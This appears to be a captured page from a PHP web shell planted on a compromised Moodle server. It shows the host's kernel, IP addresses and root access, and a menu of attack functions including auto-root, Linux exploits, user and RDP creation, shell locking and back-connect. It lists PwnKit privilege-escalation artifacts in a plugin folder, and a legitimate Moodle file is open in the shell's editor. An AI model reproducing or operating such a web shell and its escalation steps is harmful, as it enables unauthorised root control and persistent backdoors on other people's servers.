Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
media /
player /
vimeo /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
pix
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
version.php
1.1
KB
-rwxrwxrwx
wsplayer.php
2.62
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wsplayer.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * A script to embed vimeo videos via the site (so vimeo privacy restrictions by domain will work in the mobile app). * * The site is doing a double frame embedding: * - First, the media player replaces the vimeo link with an iframe pointing to vimeo. * - Second, the app replaces the previous iframe link with a link to this file that includes again the iframe to vimeo. * Thanks to these changes, the video is embedded in a page in the site server so the privacy restrictions will work. * * Note 1: Vimeo privacy restrictions seems to be based on the Referer HTTP header. * Note 2: This script works even if the plugin is disabled (some users could be using the vimeo embedding code). * * @package media_vimeo * @copyright 2017 Juan Leyva * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ define('NO_MOODLE_COOKIES', true); require_once(__DIR__ . '/../../../config.php'); require_once($CFG->dirroot . '/webservice/lib.php'); $token = required_param('token', PARAM_ALPHANUM); $video = required_param('video', PARAM_ALPHANUM); // Video ids are numeric, but it's more solid to expect things like 00001. $width = optional_param('width', 0, PARAM_INT); $height = optional_param('height', 0, PARAM_INT); // Authenticate the user. $webservicelib = new webservice(); $webservicelib->authenticate_user($token); if (empty($width) && empty($height)) { // Use the full page. The video will keep the ratio. $display = 'style="position:absolute; top:0; left:0; width:100%; height:100%;"'; } else { $display = "width=\"$width\" height=\"$height\""; } $output = <<<OET <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> </head> <body style="margin:0; padding:0"> <iframe src="https://player.vimeo.com/video/$video" $display frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen> </iframe> </body> </html> OET; echo $output;
Close
